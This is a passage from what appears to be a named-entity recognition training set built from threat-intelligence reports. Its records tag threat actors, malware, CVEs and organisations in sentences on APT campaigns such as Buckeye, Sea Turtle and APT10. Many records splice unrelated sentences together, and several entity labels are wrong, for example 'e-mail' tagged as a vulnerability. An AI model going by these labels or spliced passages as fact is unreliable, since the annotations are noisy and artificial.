CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 .", "spans": {"ORGANIZATION: Google": [[0, 6]], "ORGANIZATION: Microsoft": [[11, 20]], "THREAT_ACTOR: APT28": [[69, 74]], "VULNERABILITY: CVE-2016-7855": [[102, 115]], "VULNERABILITY: CVE-2017-0143": [[196, 209]], "VULNERABILITY: exploit": [[237, 244]], "FILEPATH: tools—EternalRomance": [[245, 265]], "FILEPATH: EternalSynergy—that": [[270, 289]]}, "info": {"id": "cyberner_stix_train_002182", "source": "cyberner_stix_train"}} {"text": "The following factors supporting this assessment are further detailed in this post .", "spans": {}, "info": {"id": "cyberner_stix_train_002183", "source": "cyberner_stix_train"}} {"text": "Based on this discovery , we began to look for other binaries signed with the South Korean mobile software developer's certificate .", "spans": {}, "info": {"id": "cyberner_stix_train_002184", "source": "cyberner_stix_train"}} {"text": "We identified 42 apps on Google Play as belonging to the campaign , which had been running since July 2018 . In a recent campaign , Kaspersky observed ScarCruft using a multi-stage binary to infect several victims and ultimately install a final payload known as ROKRAT – a cloud service-based backdoor . 
The executable performs the following tasks: If the system is a 64-bit version of Windows , it downloads and executes a specific 64-bit version of the malware thanks to a powershell script .", "spans": {"SYSTEM: Google Play": [[25, 36]], "ORGANIZATION: Kaspersky": [[132, 141]], "THREAT_ACTOR: ScarCruft": [[151, 160]], "TOOL: ROKRAT": [[262, 268]], "SYSTEM: Windows": [[386, 393]], "TOOL: powershell": [[475, 485]]}, "info": {"id": "cyberner_stix_train_002185", "source": "cyberner_stix_train"}} {"text": "In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . The document attached to this e-mail exploits CVE-2012-0158 .", "spans": {"MALWARE: BalkanDoor": [[33, 43]], "VULNERABILITY: CVE-2018-20250": [[228, 242]], "VULNERABILITY: e-mail": [[275, 281]], "VULNERABILITY: exploits": [[282, 290]], "VULNERABILITY: CVE-2012-0158": [[291, 304]]}, "info": {"id": "cyberner_stix_train_002186", "source": "cyberner_stix_train"}} {"text": "The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 .", "spans": {"MALWARE: email stealer": [[4, 17]], "FILEPATH: ThreeDollars delivery document": [[295, 325]], "THREAT_ACTOR: OilRig": [[363, 369]]}, "info": {"id": "cyberner_stix_train_002187", "source": "cyberner_stix_train"}} {"text": "The most significant change in this particular Trojan ’ s history was the encryption of data sent between the device and C & C . 
Based on BRONZE UNION 's targeting activity , CTU researchers assess it is highly likely that the group focuses on political and defense organization networks . Users can consider adopting security solutions that can defend against malicious bot-related activities such as Outlaw ’s through a cross-generational blend of threat defense techniques . Adversaries may also use CLIs to install and run new software , including malicious tools that may be installed over the course of an operation .", "spans": {"ORGANIZATION: CTU": [[175, 178]], "ORGANIZATION: political": [[244, 253]], "ORGANIZATION: defense organization": [[258, 278]], "THREAT_ACTOR: Outlaw": [[402, 408]]}, "info": {"id": "cyberner_stix_train_002188", "source": "cyberner_stix_train"}} {"text": "Microsoft is aware of CVE-2015-1701 and is working on a fix .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "VULNERABILITY: CVE-2015-1701": [[22, 35]]}, "info": {"id": "cyberner_stix_train_002189", "source": "cyberner_stix_train"}} {"text": "XENOTIME configured TRISIS based on the specifics and functions of the Triconex system within the industrial control ( ICS ) environment .", "spans": {"THREAT_ACTOR: XENOTIME": [[0, 8]], "MALWARE: TRISIS": [[20, 26]], "TOOL: Triconex": [[71, 79]], "TOOL: industrial control": [[98, 116]], "TOOL: ICS": [[119, 122]]}, "info": {"id": "cyberner_stix_train_002190", "source": "cyberner_stix_train"}} {"text": "FakeSpy uses an anti-debugging technique by creating another child process of itself . During our research into this attack campaign , Unit 42 gathered several tools that the Emissary Panda uploaded to the three webshells at the two government organizations . 
Some of the malicious documents were test files without the implant .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "ORGANIZATION: Unit 42": [[135, 142]], "THREAT_ACTOR: Emissary Panda": [[175, 189]], "ORGANIZATION: government organizations": [[233, 257]], "MALWARE: test files": [[297, 307]]}, "info": {"id": "cyberner_stix_train_002191", "source": "cyberner_stix_train"}} {"text": "As we have seen in some previous targeted malware attacks , the attackers in this incident are taking advantage of services like changeip.com to establish free subdomains in their infrastructure . When the adversaries' operations are live , they modify the record again to point the C2 domain to an IP address they can access .", "spans": {"TOOL: C2": [[283, 285]]}, "info": {"id": "cyberner_stix_train_002192", "source": "cyberner_stix_train"}} {"text": "Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . APT40 is described as a moderately sophisticated cyber-espionage group which combines access to significant development resources with the ability to leverage publicly available tools .", "spans": {"ORGANIZATION: Securelist": [[21, 31]], "VULNERABILITY: zero-day Adobe Flash Player exploit": [[61, 96]], "THREAT_ACTOR: APT40": [[128, 133]], "MALWARE: publicly available tools": [[287, 311]]}, "info": {"id": "cyberner_stix_train_002193", "source": "cyberner_stix_train"}} {"text": "This mistake in operational security allowed us to gain visibility into exfiltrated content for a number of devices . Only one client , based in Iran , continued to communicate with the infrastructure . 
Below is a list of zones registered by APT1 that are newsthemed : As Google Analytics is allowed in the CSP configuration of many major sites , this demo shows how an attacker can bypass this security protection and steal data .", "spans": {"THREAT_ACTOR: APT1": [[242, 246]], "SYSTEM: Google Analytics": [[272, 288]], "SYSTEM: CSP": [[307, 310]], "THREAT_ACTOR: attacker": [[370, 378]]}, "info": {"id": "cyberner_stix_train_002194", "source": "cyberner_stix_train"}} {"text": "An example SMS message is shown in Figure 1 . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information . Finally , it will be run using “ post.php ” as argument . But while it was clear earlier on that attackers were actively exploiting CVE-2023 - 34362 , it was only a few days later that it became clear that Cl0p was behind the attacks .", "spans": {"THREAT_ACTOR: Attackers": [[46, 55]], "ORGANIZATION: oil": [[240, 243]], "ORGANIZATION: gas": [[246, 249]], "ORGANIZATION: petrochemical companies": [[256, 279]], "ORGANIZATION: executives": [[309, 319]], "FILEPATH: post.php": [[470, 478]], "VULNERABILITY: CVE-2023 - 34362": [[569, 585]], "THREAT_ACTOR: Cl0p": [[643, 647]]}, "info": {"id": "cyberner_stix_train_002195", "source": "cyberner_stix_train"}} {"text": "Android remains a prime target for malicious attacks . This is a hacking group with Chinese origins which targets selected organisations related with education , energy and technology . The suspicious sample detected by Augur is actually a new 32-bit ShadowPad launcher . 
The malware then checks the command execution functionality using a command that vary across the samples .", "spans": {"SYSTEM: Android": [[0, 7]], "ORGANIZATION: education": [[150, 159]], "ORGANIZATION: energy": [[162, 168]], "ORGANIZATION: technology": [[173, 183]], "TOOL: Augur": [[220, 225]], "MALWARE: ShadowPad": [[251, 260]], "MALWARE: The malware": [[272, 283]]}, "info": {"id": "cyberner_stix_train_002196", "source": "cyberner_stix_train"}} {"text": "SeaDuke is made interesting by the fact that it is written in Python and designed to be cross-platform so that it works on both Windows and Linux .", "spans": {"MALWARE: SeaDuke": [[0, 7]], "TOOL: Python": [[62, 68]], "SYSTEM: Windows": [[128, 135]], "SYSTEM: Linux": [[140, 145]]}, "info": {"id": "cyberner_stix_train_002197", "source": "cyberner_stix_train"}} {"text": "In this scenario , one or more persons – likely including at least one CNIIHM employee , based on the moniker discussed above – would have had to conduct extensive , high-risk malware development and intrusion activity from CNIIHM ’s address space without CNIIHM ’s knowledge and approval over multiple years .", "spans": {"ORGANIZATION: CNIIHM": [[71, 77], [224, 230], [256, 262]]}, "info": {"id": "cyberner_stix_train_002198", "source": "cyberner_stix_train"}} {"text": "The second method uses intents , broadcasts , and receivers to execute HenBox code . In June 2018 , APT41 sent spear-phishing emails using an invitation lure to join a decentralized gaming platform linked to a cryptocurrency service (Figure 5) that had positioned itself as a medium of exchange for online games and gambling sites . 
On December 29 , 2016 , the Department of Homeland Security ( DHS ) and Federal Bureau of Investigation ( FBI ) released a Joint Analysis Report confirming FireEye 's long held public assessment that the Russian government sponsors APT28 .", "spans": {"THREAT_ACTOR: APT41": [[100, 105]], "ORGANIZATION: Department of Homeland Security": [[361, 392]], "ORGANIZATION: DHS": [[395, 398]], "ORGANIZATION: FBI": [[439, 442]], "ORGANIZATION: FireEye": [[489, 496]], "ORGANIZATION: Russian government": [[537, 555]], "THREAT_ACTOR: APT28": [[565, 570]]}, "info": {"id": "cyberner_stix_train_002199", "source": "cyberner_stix_train"}} {"text": "After publishing our initial series of blogposts back in 2016 , Kaspersky has continued to track the ScarCruft threat actor . These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group . Over the coming months , it progressively released more tools , until April 2017 , when it released a final , large cache of tools , including the DoublePulsar backdoor , the FuzzBunch framework , and the EternalBlue , EternalSynergy , and EternalRomance exploit tools . However , Buckeye had already been using some of these leaked tools at least a year beforehand . The earliest known use of Equation Group tools by Buckeye is March 31 , 2016 , during an attack on a target in Hong Kong . Beginning in March 2016 , Buckeye began using a variant of DoublePulsar (Backdoor.Doublepulsar) , a backdoor that was subsequently released by the Shadow Brokers in 2017 . However , while activity involving known Buckeye tools ceased in mid-2017 , the Bemstour exploit tool and the DoublePulsar variant used by Buckeye continued to be used until at least September 2018 in conjunction with different malware . 
During this attack , the Bemstour exploit tool was delivered to victims via known Buckeye malware (Backdoor.Pirpi) . One hour later , Bemstour was used against an educational institution in Belgium . Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . DoublePulsar is then used to inject a secondary payload , which runs in memory only . A significantly improved variant of the Bemstour exploit tool was rolled out in September 2016 , when it was used in an attack against an educational institution in Hong Kong . When used against 32-bit targets , Bemstour still delivered the same DoublePulsar backdoor . Bemstour was used again in June 2017 in an attack against an organization in Luxembourg . Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam . Development of Bemstour has continued into 2019 . Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan (Backdoor.Filensfer) . The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft . Filensfer is a family of malware that has been used in targeted attacks since at least 2013 . The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the ACT the Windows SMB Server handles certain requests . While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) . CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 . 
Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers . In the case of the Buckeye exploit tool , the attackers exploited their own zero-day vulnerability (CVE-2019-0703) . It is noteworthy that the attackers never used the FuzzBunch framework in its attacks . FuzzBunch is a framework designed to manage DoublePulsar and other Equation Group tools and was leaked by the Shadow Brokers in 2017 . There are multiple possibilities as to how Buckeye obtained Equation Group tools before the Shadow Brokers leak . However , aside from the continued use of the tools , Symantec has found no other evidence suggesting Buckeye has retooled . this RTF exploits again the CVE-2017-1882 on eqnedt32.exe . And the dropper execute the iassvcs.exe to make a side loading and make the persistence . This IP is very interesting because it connects with tele.zyns.com and old infrastructures used by chinese APT or DDOS Chinese team against the ancient soviet republics . Over the past three years , Filensfer has been deployed against organizations in Luxembourg , Sweden , Italy , the UK , and the U.S . All zero-day exploits known , or suspected , to have been used by this group are for vulnerabilities in Internet Explorer and Flash . According to reports , the Philippines is the most exposed country in ASEAN to the cyberattacks known as advanced persistent threats , or APTs . Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 . OutExtra.exe is a signed legitimate application from Microsoft named finder.exe . 
In addition to file-based protection , customers of the DeepSight Intelligence Managed Adversary and Threat Intelligence (MATI) service have received reports on Buckeye , which detail methods of detecting and thwarting activities of this group . However , in this attack , this file is used to load the Hussarini backdoor via DLL hijacking . Today , this malware is still actively being used against the Philippines . Hussarini was first mentioned in APT campaigns targeting the Philippines and Thailand in 2014 . Further analysis showed that the Iron cybercrime group used two main functions from HackingTeam's source in both IronStealer and Iron ransomware . Xagent” is the original filename Xagent.exe whereas seems to be the version of the worm . Xagent – A variant of JbossMiner Mining Worm” – a worm written in Python and compiled using PyInstaller for both Windows and Linux platforms . Its activities were traced back to 2010 in FireEye's 2013 report on operation Ke3chang – a cyberespionage campaign directed at diplomatic organizations in Europe . We have been tracking the malicious activities related to this threat actor and discovered a previously undocumented malware family with strong links to the Ke3chang group – a backdoor we named Okrum . Furthermore , from 2015 to 2019 , we detected new versions of known malware families attributed to the Ke3chang group – BS2005 backdoors from operation Ke3chang and the RoyalDNS malware , reported by NCC Group in 2018 . Ke3chang behind the attacks seemed to have a particular interest in Slovakia , where a big portion of the discovered malware samples was detected; Croatia , the Czech Republic and other countries were also affected . Our technical analysis of the malware used in these attacks showed close ties to BS2005 backdoors from operation Ke3chang , and to a related TidePool malware family discovered by Palo Alto Networks in 2016 that targeted Indian embassies across the globe . 
The story continued in late 2016 , when we discovered a new , previously unknown backdoor that we named Okrum . The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors . We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 . In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors . This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor . According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 . In addition to file-based protection , customers of the DeepSight has received reports on Buckeye , which detail methods of detecting and thwarting activities of this group . In 2018 , we discovered a new version of the Ketrican backdoor that featured some code improvements . According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia . Indeed , we have detected various external tools being abused by Okrum , such as a keylogger , tools for dumping passwords , or enumerating network sessions . The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . The unnamed company makes products used in the military and aerospace industries , and the hackers could have been after commercial secrets or more traditional espionage , according to ClearSky , the cybersecurity firm that exposed the operation . 
North Korean dictator Kim Jong Un has set ambitious economic goals , and some cybersecurity analysts have predicted he will unleash the Pyongyang-affiliated hackers to meet those deadlines by targeting multinational companies’ trade secrets . According to ClearSky , the suspected Lazarus operatives looked to leverage a vulnerability in outdated WinRAR file-archiving software that hackers have been exploiting since it was disclosed last month . This new Lotus Blossom campaign delivers a malicious RTF document posing as an ASEAN Defence Minister's Meeting (ADMM) directory (decoy) that also carries an executable (payload) embedded as an OLE object , the Elise backdoor . Just months after the APT32 watering hole activity against ASEAN-related websites was observed in Fall 2017 , this new activity clearly indicates the association (ASEAN) clearly remains a priority collection target in the region . Researchers implicated Lazarus Group because of digital clues including a malicious implant known as Rising Sun that has been attributed to the group . The attackers originally embedded an implant into the malicious document as a hypertext application (HTA) file , and then quickly moved to hide it in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script . Lazarus used the open-source tool Invoke-PSImage , released December 20 , to embed the PowerShell script into the image file . Once the script runs , it passes the decoded script from the image file to the Windows command line in a variable $x , which uses cmd.exe to execute the obfuscated script and run it via PowerShell . The Department of Homeland Security (DHS) issued an alert about this activity on Jan. 24 2019 , warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names . In the Sea Turtle campaign , Talos was able to identify two distinct groups of victims . 
The first group , we identify as primary victims , includes national security organizations , ministries of foreign affairs , and prominent energy organizations . The threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors . In most cases , threat actors typically stop or slow down their activities once their campaigns are publicly revealed . The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . If an attacker was able to compromise an organization's network administrator credentials , the attacker would be able to change that particular organization's DNS records at will . If the attackers were able to obtain one of these EPP keys , they would be able to modify any DNS records that were managed by that particular registrar . Captured legitimate user credentials when users interacted with these actor - controlled servers . The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . As of early 2019 , the only evidence of the spear-phishing threat vector came from a compromised organization's public disclosure . On January 4 , Packet Clearing House , which is not an Internet exchange point but rather is an NGO which provides support to Internet exchange points and the core of the domain name system , provided confirmation of this aspect of the actors’ tactics when it publicly revealed its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar . During a typical incident , the actor would modify the NS records for the targeted organization , pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries . The next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials . 
In addition to the MitM server IP addresses published in previous reports , Talos identified 16 additional servers leveraged by the actor during the observed attacks . The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials . In some cases , the victims were redirected to these actor-controlled servers displaying the stolen certificate . One notable aspect of the campaign was the actors' ability to impersonate VPN applications , such as Cisco Adaptive Security Appliance (ASA) products , to perform MitM attacks . At this time , we do not believe that the attackers found a new ASA exploit . Rather , they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network . As an example , DNS records indicate that a targeted domain resolved to an actor-controlled MitM server . In another case , the attackers were able to compromise NetNod , a non-profit , independent internet infrastructure organization based in Sweden . Using this access , the threat actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net . This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa) . In one of the more recent campaigns on March 27 , 2019 , the threat actors targeted the Sweden-based consulting firm Cafax . We assess with high confidence that Sea Turtle was targeted in an attempt to re-establish access to the NetNod network , which was previously compromised by this threat actor . Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs . These actors perform DNS hijacking through the use of actor-controlled name servers . Sea Turtle have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs . 
These actors use Let's Encrypts , Comodo , Sectigo , and self-signed certificates in their MitM servers to gain the initial round of credentials . These actors have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs . Once they have access to the network , they steal the organization's legitimate SSL certificate and use it on actor-controlled servers . we believe that the Sea Turtle campaign continues to be highly successful for several reasons . Had more ccTLDs implemented security features such as registrar locks , attackers would be unable to redirect the targeted domains . The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials , allowing the actors to gain access to the targeted network . The threat actors were able to maintain long term persistent access to many of these networks by utilizing compromised credentials . Cisco Talos will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve to ensure that our customers remain protected and the public is informed . If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . Create a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart . More importantly , one of these files also enables the download of TeamViewer , a remote access tool that gives threat actors remote control over the system . Such attacks highlight the need for caution before downloading files from unknown sources and enabling macro for files from unknown sources . The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities . 
By the end of 2016 , the CIA's hacking division , which formally falls under the agency's Center for Cyber Intelligence (CCI) , had over 5000 registered users and had produced more than a thousand hacking systems , trojans , viruses , and other weaponized malware . Such is the scale of the CIA's undertaking that by 2016 , its hackers had utilized more code than that used to run Facebook . Wikileaks has carefully reviewed the Year Zero disclosure and published substantive CIA documentation while avoiding the distribution of 'armed' cyberweapons until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should analyzed , disarmed and published . These redactions include ten of thousands of CIA targets and attack machines throughout Latin America , Europe and the United States . The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell's 1984 , but Weeping Angel , developed by the CIA's Embedded Devices Branch (EDB) , which infests smart TVs , transforming them into covert microphones , is surely its most emblematic realization . After infestation , Weeping Angel places the target TV in a 'Fake-Off' mode , so that the owner falsely believes the TV is off when it is on . As of October 2014 the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks . The CIA's Mobile Devices Branch (MDB) developed numerous attacks to remotely hack and control popular smart phones . Despite iPhone's minority share (14.5%) of the global smart phone market in 2016 , a specialized unit in the CIA's Mobile Development Branch produces malware to infest , control and exfiltrate data from iPhones and other Apple products running iOS , such as iPads . The attack against Samsung smart TVs was developed in cooperation with the United Kingdom's MI5/BTSS . 
CIA's arsenal includes numerous local and remote zero days developed by CIA or obtained from GCHQ , NSA , FBI or purchased from cyber arms contractors such as Baitshop . These techniques permit the CIA to bypass the encryption of WhatsApp , Signal , Telegram , Wiebo , Confide and Cloackman by hacking the smart phones that they run on and collecting audio and message traffic before encryption is applied . The CIA also runs a very substantial effort to infect and control Microsoft Windows users with its malware . CIA's malware includes multiple local and remote weaponized zero days , air gap jumping viruses such as Hammer Drill which infects software distributed on CD/DVDs , infectors for removable media such as USBs , systems to hide data in images or in covert disk LOCs Brutal Kangaroo and to keep its malware infestations going . Many of these infection efforts are pulled together by the CIA's Automated Implant Branch (AIB) , which has developed several attack systems for automated infestation and control of CIA malware , such as Assassin and Medusa . The CIA has developed automated multi-platform malware attack and control systems covering Windows , Mac OS X , Solaris , Linux and more , such as EDB's HIVE and the related Cutthroat and Swindle tools , which are described in the examples section below . By hiding these security flaws from manufacturers like Apple and Google the CIA ensures that it can hack everyone &mdsh; at the expense of leaving everyone hackable . Once in Frankfurt CIA hackers can travel without further border checks to the 25 European countries that are part of the Shengen open border LOC — including France , Italy and Switzerland . A number of the CIA's electronic attack methods are designed for physical proximity . The attacker is provided with a USB containing malware developed for the CIA for this purpose , which is inserted into the targeted computer . The attacker then infects and exfiltrates data to removable media . 
As an example , specific CIA malware revealed in Year Zero is able to penetrate , infest and control both the Android phone and iPhone software that runs or has run presidential Twitter accounts . For example , the CIA attack system Fine Dining , provides 24 decoy applications for CIA spies to use . For example , Comodo was defeated by CIA malware placing itself in the Window's Recycle Bin . CIA hackers discussed what the NSA's Equation Group hackers did wrong and how the CIA's malware makers could avoid similar exposure . The CIA's Remote Devices Branch's UMBRAGE group collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation . This information is used by the CIA's 'JQJIMPROVISE' software (see below) to configure a set of CIA malware suited to the specific needs of an operation . Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies . HIVE is a multi-platform CIA malware suite and its associated control software . A series of standards lay out CIA malware infestation patterns which are likely to assist forensic crime scene investigators as well as Apple , Microsoft , Google , Samsung , Nokia , Blackberry , Siemens and anti-virus companies attribute and defend against attacks . In April 2013 , Kaspersky Lab reported that a popular game was altered to include a backdoor in 2011 . Yet again , new supply-chain attacks recently caught the attention of ESET Researchers . Given that these attacks were mostly targeted against Asia and the gaming industry , it shouldn’t be surprising they are the work of the group described in Kaspersky’s Winnti – More than just a game” . The OSB functions as the interface between CIA operational staff and the relevant technical support staff . 
A sustained cyberespionage campaign targeting at least three companies in the United States and Europe was uncovered by Recorded Future and Rapid7 between November 2017 and September 2018 . The Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . The attackers then enumerated access and conducted privilege escalation on the victim networks , utilizing DLL sideloading techniques documented in a US-CERT alert on APT10 to deliver malware . On the two other victim networks , the attackers deployed a unique version of the UPPERCUT (ANEL) backdoor , known to have only been used by APT10 . APT10 actors then compressed proprietary data from Visma using WinRAR (deployed by the attackers) and exfiltrated to a Dropbox account using the cURL for Windows command-line tool . UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . we assess with high confidence that these incidents were conducted by APT10 also known as Stone Panda , menuPass , CVNX in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage . On top of the breadth , volume , and targets of attacks that APT10 has conducted since at least 2016 , we now know that these operations are being run by the Chinese intelligence agency , the Ministry of State Security (MSS) . Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd , the MSS has conducted an unprecedented campaign , dubbed Operation Cloud Hopper , ” against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients . 
We assess that APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks , and not of stealing Visma intellectual property . In this same time frame , APT10 also targeted a U.S. law firm and an international apparel company , likely to gather information for commercial advantage . The backdoor was deployed using the Notepad++ updater and sideloading malicious DLL , as noted in APT10’s targeting of Japanese corporations in July 2018 . That attack was attributed to perpetrators Kaspersky called the Winnti Group . APT10 is a threat actor that has been active since at least 2009 . APT10 has historically targeted healthcare , defense , aerospace , government , heavy industry and mining , and MSPs and IT services , as well as other sectors , for probable intellectual property theft . We believe APT10 is the most significant Chinese state-sponsored cyber threat to global corporations known to date . In the blog , Intrusion Truth identified APT10 as having utilized several Tianjin-based companies , including Huaying Haitai Science and Technology Development Co. Ltd. and Laoying Baichen Instruments Equipment Co. Ltd . Based on the technical data uncovered , and in light of recent disclosures by the U.S. Department of Justice on the ongoing activities of Chinese state-sponsored threat actors . Our research from 2017 concluded that Guangdong ITSEC (and therefore the MSS) directed the activities of a company named Boyusec , which was identified as a shell company for APT3 . Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds , if not thousands , of corporations around the world . 
The December APT10 indictment noted that the group’s malicious activities breached at least 45 companies and managed service providers in 12 countries , including Brazil , Canada , Finland , France , Germany , India , Japan , Sweden , Switzerland , the United Arab Emirates , the United Kingdom , and the United States . In all three incidents , APT10 gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . In all three incidents , the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . In all three incidents , APT10 actors used previously acquired legitimate credentials , possibly gained via a third-party supply chain compromise in order to gain initial access to the law firm and the apparel company . In early 2017 , APT10 began conducting attacks against global managed IT service providers (MSPs) that granted them unprecedented access to MSPs and their customers’ networks . 'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/Exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS ( JukeBox ) and Linux ( DanceFloor ) . . During this operation (dubbed ‘Cloud Hopper” because of the group’s use of popular western cloud-based services) , APT10 utilized both new malware (Quasar RAT , Trochilus , RedLeaves , ChChes as well as some familiar old tools . Most recently , on December 20 , 2018 , the U.S. Department of Justice charged two hackers associated with the Chinese Ministry of State Security (MSS) with global computer intrusion campaigns targeting intellectual property . This indictment attributed the intrusions to APT10 , a group that had been conducting the malicious activities for over a decade on behalf of the MSS , China’s civilian human intelligence agency . 
The Visma group operates across the entire Nordic region along with Benelux , Central , and Eastern Europe . Recorded Future has actively tracked APT10 for several years , focusing specifically on the group’s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 . We were particularly interested in identifying whether any customers of the targeted MSPs were subsequently compromised by APT10 , given their potential access through compromised MSP networks . Recorded Future’s Insikt Group has actively tracked APT10 for several years , focusing specifically on the group’s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 . In September 2018 , one of our clients (and a supplier as well) , Visma , reached out to us for assistance in investigating an incident uncovered on their network following a breach notification by Rapid7 . This was followed by an initial exploitation , network enumeration , and malicious tool deployment on various Visma endpoints within two weeks of initial access . On August 30 , 2018 , APT10 deployed their first modified version of Trochilus that had its C2 communications encrypted using Salsa20 and RC4 ciphers instead of the more common RC4-encrypted Trochilus variant seen in the wild . This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . APT10 also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . In order to exfiltrate the compromised data , APT10 employed custom malware that used Dropbox as its C2 . 
They also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . Our research partner Rapid7 investigated the Dropbox use and found that the attackers had used the same account to store exfiltrated data from a global apparel company . They also identified broadly similar TTPs being used in the attack against a U.S. law firm specializing in intellectual property law . Rapid7’s investigation revealed the law firm was first targeted in late 2017 , followed by the apparel company a few months later , and finally , the Visma attack in August 2018 . In one of the attacks , Rapid7 identified the attackers escaping a Citrix application in order to run the payload script on the victim desktop . Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by the APT10 shared naming similarities as well 1.bat , cu.exe , ss.rar , r.exe , pd.exe . Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor also known as ANEL . APT10 used this approach to deploy UPPERCUT when targeting Japanese corporations in July 2018 . APT10 actors gained initial access to the Visma network around August 17 , 2018 . While we are confident that APT10 actors gained access to the Visma network in August using stolen employee Citrix remote desktop credentials , it is not clear how or when these credentials were initially compromised . Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 